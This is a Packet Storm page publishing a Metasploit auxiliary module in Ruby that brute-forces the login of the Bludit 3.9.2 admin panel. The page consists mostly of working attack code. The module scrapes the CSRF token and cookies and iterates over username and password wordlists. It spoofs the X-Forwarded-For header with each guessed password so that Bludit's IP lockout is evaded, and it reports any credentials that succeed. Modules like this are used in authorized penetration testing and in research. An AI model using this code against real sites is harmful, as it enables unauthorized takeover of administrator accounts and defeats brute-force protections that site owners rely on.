exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Bludit Panel Brute Forcer

Bludit Panel Brute Forcer
Posted Nov 13, 2020
Authored by Eren Simsek | Site metasploit.com

This Metasploit module performs an authentication brute forcing attack against the panel in Bludit version 3.9.2.

tags | exploit, bypass
SHA-256 | 928cdffa4a05fe84712529c35407c5d41b2df004f63f924f0f27c011e6938ebd

Bludit Panel Brute Forcer

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'Bludit Panel Brute force',
'Description' => %q{
This Module performs brute force attack on Bludit Panel.
},
'Author' => 'Eren Simsek <egtorteam@gmail.com>',
'License' => MSF_LICENSE,
'DisclosureDate' => 'June 7 2020')
register_options(
[
OptString.new('TARGETURI', [ true, 'Bludit Panel Uri', 'admin']),
OptString.new('USERNAME', [ false, 'Bludit account username']),
OptString.new('PASSWORD', [ false, 'Bludit account password']),
OptPath.new('USER_FILE', [ false, 'The User wordlist path']),
OptPath.new('PASS_FILE', [ false, 'The Pass wordlist path']),
OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users']),
])
end
def check_variable
if datastore["USERNAME"] != nil
if datastore["USER_FILE"] != nil
raise Msf::OptionValidateError.new(['USER_FILE'])
end
end
if datastore["PASSWORD"] != nil
if datastore["PASS_FILE"] != nil
raise Msf::OptionValidateError.new(['PASS_FILE'])
end
end
if datastore["USER_FILE"] != nil
if datastore["USERNAME"] != nil
raise Msf::OptionValidateError.new(['USERNAME'])
end
end
if datastore["PASS_FILE"] != nil
if datastore["PASSWORD"] != nil
raise Msf::OptionValidateError.new(['PASSWORD'])
end
end
end
@signed = false
def brute_force(username,password)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'GET',
})
#Send request target website
username = username.strip
password = password.strip
#strip command remove spaces
bluditkey = res.get_cookies
#Send request target website and get cookies
csrf = res.body.scan(/<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)">/).flatten[0] || ''
#Get CSRF Token
if bluditkey == nil #if cookies not found
fail_with(Failure::UnexpectedReply, "Cookie Not Found !")
end
if csrf == nil #if csrf token not found
fail_with(Failure::UnexpectedReply, "CSRF Not Found !")
end
print_warning("Trying #{username}:#{password}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'POST',
'cookie' => bluditkey,
'headers' => {
'X-Forwarded-For' => password, #host injected and unblock ip address
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer' => normalize_uri(target_uri.path,'/'),
},
'vars_post' => { #post method variables
'tokenCSRF' => csrf,
'username' => username,
'password' => password,
'save' => '',
},
})
if res && res.code != 200 #if request cod not 200 ok
if res && res.headers['Location'] == '/admin/dashboard' #if signed web site
print_good("Found #{username}:#{password}")
@signed = true
else #request not 200 error
fail_with(Failure::UnexpectedReply, " Request Not Success Code #{res.code}")
end
end
end
def run
check_variable #check variable, not use user_file if use username
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'GET',
})
if res && res.code == 200
vprint_status("Request 200 OK")
else
fail_with(Failure::UnexpectedReply, "Request Not Success Code #{res.code}")
end
if datastore["USERNAME"] != nil && datastore["PASS_FILE"] != nil
unless ::File.exist?(datastore['PASS_FILE'])
#check file exit, error not found if not exist file
fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
end
@wordlist = ::File.open(datastore["PASS_FILE"],"rb")
#open pass_file
@wordlist.each_line do |password|
#each line on wordlist
password = password.strip # remove spaces
if !@signed # continue if signed false
brute_force(datastore["USERNAME"],password)
end
end
end
if datastore["USER_FILE"] != nil && datastore["PASSWORD"] != nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
end
@wordlist = ::File.open(datastore["USER_FILE"],"rb")
@wordlist.each_line do |username|
username = username.strip
if !@signed
brute_force(username,datastore["PASSWORD"])
end
end
end
if datastore["USER_FILE"] != nil && datastore["PASS_FILE"] != nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
end
unless ::File.exist?(datastore['PASS_FILE'])
fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
end
@userlist = ::File.open(datastore["USER_FILE"],"rb")
@userlist.each_line do |username|
username = username.strip
@passlist = ::File.open(datastore["PASS_FILE"],"rb")
@passlist.each_line do |password|
password = password.strip
if !@signed
brute_force(username,password)
end
end
end
end
if datastore["USER_FILE"] != nil && datastore["USER_AS_PASS"] == true && datastore["PASS_FILE"] == nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exist!"
end
@userlist = ::File.open(datastore["USER_FILE"],"rb")
@userlist.each_line do |username|
username = username.strip
@passlist = ::File.open(datastore["USER_FILE"],"rb")
@passlist.each_line do |password|
password = password.strip
if !@signed
brute_force(username,password)
end
end
end
end
end
end
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close